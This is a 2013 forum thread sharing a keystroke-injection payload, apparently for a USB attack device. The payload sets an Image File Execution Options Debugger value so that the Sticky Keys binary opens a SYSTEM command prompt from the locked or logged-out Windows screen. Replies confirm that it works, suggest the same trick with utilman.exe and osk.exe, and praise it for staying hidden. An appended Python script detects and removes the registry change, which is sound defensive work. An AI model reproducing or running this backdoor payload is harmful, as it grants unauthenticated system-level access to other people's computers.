crackruckles
Posted September 19, 2013

DISCLAIMER

First off, I have posted this on GitHub, but I thought I'd add it here as well, as this is version 2. This command prompt will close automatically due to the way this hack works (after about 3 minutes or so). This hack does require pre work and does require administrator privileges to modify the registry, and I am assuming that UAC is turned on.

Pre work

DELAY 400
ESCAPE
DELAY 200
CONTROL ESCAPE
DELAY 750
STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"
DELAY 750
CTRL-SHIFT ENTER
DELAY 1000
ALT y

Left Alt + Left Shift + Print Screen to access the system prompt from anywhere on the machine, including when the machine is logged out or locked.

Have fun guys.

parkour86
Posted September 19, 2013

Thanks for sharing this payload, it works perfectly. Is this payload permanent or can I just delete the sethc.exe folder in the registry without messing anything up?

Xcellerator
Posted September 19, 2013

I did the same thing as this payload except with utilman.exe (Utility Manager) instead of sethc.exe. I believe osk.exe (on screen keyboard) is also run as SYSTEM on any Windows machine, so would also work.

crackruckles (Author)
Posted September 20, 2013

> Thanks for sharing this payload it works perfectly. Is this payload permanent or can I just delete the sethc.exe folder in the registry without messing anything up?

You can just delete it and it will be back to normal.

> I did the same thing as this payload except with utilman.exe (Utility Manager) instead of sethc.exe. I believe osk.exe (on screen keyboard) is also ran as SYSTEM on any windows machine, so would also work.

Yeah, you can use any of them, but I prefer sethc as it's nice and hidden and it has quite a long time out period.

mr.dude5660
Posted May 27, 2014

@crackruckles, I have tried this on a number of computers running Win7 and whenever I hit left alt+left shift+prtscn I get high contrast mode. I used the exact script you've posted. Any ideas?

Edited May 27, 2014 by mr.dude5660
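
For defenders, an added example that is not part of the thread or the payload author's code: it audits the output of `reg query "<Image File Execution Options key>" /s` for a `Debugger` value on the three accessibility binaries named above and builds the matching cleanup command. The sample output is constructed, and the names `find_ifeo_debuggers` and `cleanup_command` are hypothetical.

```python
import re

IFEO = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
        r"\CurrentVersion\Image File Execution Options")
# Binaries named in the thread; each can be launched from the logon screen.
WATCHED = {"sethc.exe", "utilman.exe", "osk.exe"}

# Constructed sample of `reg query "<IFEO>" /s` output (not from a real host).
SAMPLE = "\n".join([
    "",
    IFEO + r"\notepad.exe",
    r"    Debugger    REG_SZ    C:\tools\editor.exe",
    "",
    IFEO + r"\sethc.exe",
    r"    Debugger    REG_SZ    C:\windows\system32\cmd.exe",
    "",
    IFEO + r"\Utilman.exe",
    r"    MitigationOptions    REG_QWORD    0x100",
    "",
])

def find_ifeo_debuggers(reg_query_output, watched=WATCHED):
    """Return [(image, debugger_command)] for watched images with a Debugger value."""
    findings, image = [], None
    prefix = IFEO.lower() + "\\"
    for line in reg_query_output.splitlines():
        if line.upper().startswith("HKEY_"):
            # Key header: remember which image the following values belong to.
            low = line.strip().lower()
            image = low[len(prefix):] if low.startswith(prefix) else None
            continue
        # Value lines look like: <name>    <REG_TYPE>    <data>
        parts = re.split(r"\s{4,}", line.strip(), maxsplit=2)
        if len(parts) == 3 and image in watched and parts[0].lower() == "debugger":
            findings.append((image, parts[2]))
    return findings

def cleanup_command(image):
    """Command that removes only the Debugger value for one image."""
    return 'reg delete "{}\\{}" /v Debugger /f'.format(IFEO, image)

if __name__ == "__main__":
    for image, debugger in find_ifeo_debuggers(SAMPLE):
        print("ALERT: {} launches {!r} instead".format(image, debugger))
        print("  fix:", cleanup_command(image))
```

Registry value names are case-insensitive, so the check lowercases both the image name and the value name before comparing.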